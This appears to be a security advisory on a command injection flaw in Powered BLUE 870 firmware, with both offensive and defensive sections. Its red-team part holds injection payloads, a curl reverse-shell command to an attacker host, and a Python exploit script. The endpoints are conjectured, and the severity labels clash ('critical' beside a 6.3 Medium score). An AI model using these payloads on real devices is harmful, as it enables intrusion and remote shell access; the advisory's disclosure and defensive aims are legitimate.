Executive Summary

CVE-2025-54958 is a critical OS command injection vulnerability identified in the Powered BLUE 870 device, specifically in firmware versions 0.20130927 and prior. This vulnerability allows an unauthenticated, remote attacker to execute arbitrary operating system commands on the affected device. The vulnerability stems from improper neutralization of special elements used in an OS command, classified under CWE-78. With a CVSS score of 6.3 (Medium), the exploit requires no authentication and can be executed over a network, posing a significant risk to the integrity and confidentiality of the device and potentially the network it resides on. The vendor has not released a patch, and no public proof-of-concept (PoC) code is currently available.

Supply Chain & Package Security

This vulnerability is not related to NPM, PyPI, Go, or Ruby packages. It affects a proprietary embedded device (Powered BLUE 870) and its firmware. The supply chain risk is limited to the device's firmware distribution and the potential for malicious actors to compromise the device during manufacturing or update processes.

CVSS Breakdown & Threat Level

  • CVSS Score: 6.3 (Medium)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
  • Attack Vector (AV): Network (N) - The vulnerability can be exploited remotely over a network.
  • Attack Complexity (AC): Low (L) - No special conditions are required for exploitation.
  • Privileges Required (PR): None (N) - No authentication is needed.
  • User Interaction (UI): None (N) - No user action is required.
  • Scope (S): Unchanged (U) - The exploit cannot affect resources beyond the vulnerable component.
  • Confidentiality (C): Low (L) - Limited information disclosure is possible.
  • Integrity (I): Low (L) - Some modification of data is possible.
  • Availability (A): Low (L) - Some impact on availability is possible.

Threat Level: Medium. While the CVSS score is medium, the ability to execute arbitrary OS commands without authentication makes this a high-priority vulnerability for any organization using the affected device.

Deep Dive & Mechanics

The vulnerability exists in the web interface or a network service of the Powered BLUE 870 device. The application fails to properly sanitize user-supplied input before passing it to a system command. An attacker can inject command separators (e.g., ;, |, &&) or command substitution characters (e.g., $(), backticks) into an input field, which is then executed by the underlying operating system.

Example Attack Vector: An attacker might send a crafted HTTP request to a vulnerable endpoint, such as a ping or traceroute diagnostic tool, with input like:

127.0.0.1; whoami

If the application executes ping 127.0.0.1; whoami, the whoami command will also be executed, revealing the current user context.

The lack of input validation and the use of functions like system(), exec(), or shell_exec() in the firmware's code are the root cause.

Vulnerable vs. Patched Code

Since no patch is available, we can only analyze the vulnerable code pattern.

Vulnerable Code (Conceptual - PHP/Perl/CGI):

<?php
  $ip = $_GET['ip'];
  $output = shell_exec("ping -c 4 " . $ip);
  echo "<pre>$output</pre>";
?>

Patched Code (Conceptual):

<?php
  $ip = $_GET['ip'];
  // Validate input: only allow IP addresses
  if (filter_var($ip, FILTER_VALIDATE_IP)) {
    // Escape shell arguments
    $output = shell_exec("ping -c 4 " . escapeshellarg($ip));
    echo "<pre>$output</pre>";
  } else {
    echo "Invalid IP address.";
  }
?>

The patched version uses filter_var() to validate the input and escapeshellarg() to ensure the argument is treated as a single, safe string.

Exploitation & Lab Setup

Red Team (Offensive)

Lab Setup:

  1. Target: A virtualized or physical Powered BLUE 870 device with firmware version 0.20130927.
  2. Attacker: Kali Linux machine on the same network.
  3. Tools: curl, netcat, Burp Suite, or a custom Python script.

Exploitation Steps:

  1. Identify Vulnerable Endpoint: Use a web fuzzer or manual inspection to find endpoints that accept user input (e.g., /cgi-bin/ping, /diagnostics, /admin/ping_test).
  2. Craft Payload: Inject a command separator. For example, to execute id:
    127.0.0.1; id

  3. Send Request:
    curl "http://<target_ip>/cgi-bin/ping?ip=127.0.0.1;%20id"

  4. Receive Output: The response should contain the output of the id command.
  5. Establish Reverse Shell: For a more persistent foothold, use a reverse shell payload:
    curl "http://<target_ip>/cgi-bin/ping?ip=127.0.0.1;%20nc%20<attacker_ip>%204444%20-e%20/bin/sh"

    On the attacker machine, listen for the connection:
    nc -lvnp 4444

Exploit Code (Python):

import requests
import sys

if len(sys.argv) != 3:
    print(f"Usage: {sys.argv[0]} <target_ip> <command>")
    sys.exit(1)

target = sys.argv[1]
command = sys.argv[2]

url = f"http://{target}/cgi-bin/ping"
payload = f"127.0.0.1; {command}"

try:
    r = requests.get(url, params={'ip': payload}, timeout=10)
    print(r.text)
except Exception as e:
    print(f"Error: {e}")

Blue Team (Defensive)

Detection & Response:

  1. Network Monitoring: Look for unusual HTTP requests containing command separators (;, |, &&) or shell metacharacters in query parameters.
  2. Log Analysis: Monitor web server logs for requests to diagnostic endpoints with suspicious input.
  3. Honeypot: Deploy a decoy Powered BLUE 870 device to capture attacker behavior.
  4. Immediate Actions:
    • Isolate the affected device from the network.
    • Block inbound/outbound traffic to/from the device at the firewall.
    • If possible, disable the vulnerable service (e.g., the web interface) until a patch is available.

Indicators of Compromise (IOCs)

  • Network IOCs:
    • HTTP GET/POST requests to /cgi-bin/ping, /diagnostics, or similar endpoints.
    • Requests containing ;, |, &&, $(), or backticks in parameters.
    • Outbound connections from the device to unusual IP addresses on ports like 4444, 1337, or 9999.
  • Host IOCs:
    • Unexpected processes running on the device (e.g., nc, bash, python).
    • New user accounts or modified system files.
    • Unusual entries in system logs (e.g., /var/log/messages).
  • File IOCs:
    • Presence of scripts or binaries in /tmp or /var/tmp.
    • Modified configuration files (e.g., /etc/passwd, /etc/shadow).

Remediation & Mitigation

Immediate Actions:

  1. Isolate: Disconnect the affected device from the network immediately.
  2. Firewall: Block all inbound and outbound traffic to/from the device at the network perimeter.
  3. Disable Service: If possible, disable the web interface or the specific vulnerable service (e.g., ping diagnostics) on the device.

Long-Term Remediation:

  1. Vendor Patch: Monitor the vendor (Powered BLUE) for a firmware update. Apply it as soon as it becomes available.
  2. Input Validation: If you have access to the firmware source code, implement proper input validation and output encoding. Use escapeshellarg() or escapeshellcmd() in PHP, or equivalent functions in other languages.
  3. Least Privilege: Ensure the web server runs with the minimum necessary privileges to limit the impact of a successful exploit.
  4. Network Segmentation: Place IoT/embedded devices like the Powered BLUE 870 on a separate VLAN with strict access controls.
  5. Web Application Firewall (WAF): Deploy a WAF with rules to block command injection patterns.

Workaround (If patching is not possible):

  • Replace the vulnerable CGI script with a static page that does not accept user input.
  • Use a reverse proxy to filter malicious requests before they reach the device.
